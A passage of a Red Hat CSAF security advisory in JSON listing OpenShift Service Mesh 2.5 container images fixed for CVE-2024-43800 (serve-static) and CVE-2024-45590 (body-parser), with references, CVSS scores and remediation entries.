"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
},
{
"cve": "CVE-2024-45590",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2024-09-10T16:20:29.292154+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311171"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "body-parser: Denial of Service Vulnerability in body-parser",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45590"
},
{
"category": "external",
"summary": "RHBZ#2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce",
"url": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7",
"url": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7"
}
],
"release_date": "2024-09-10T16:15:21.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
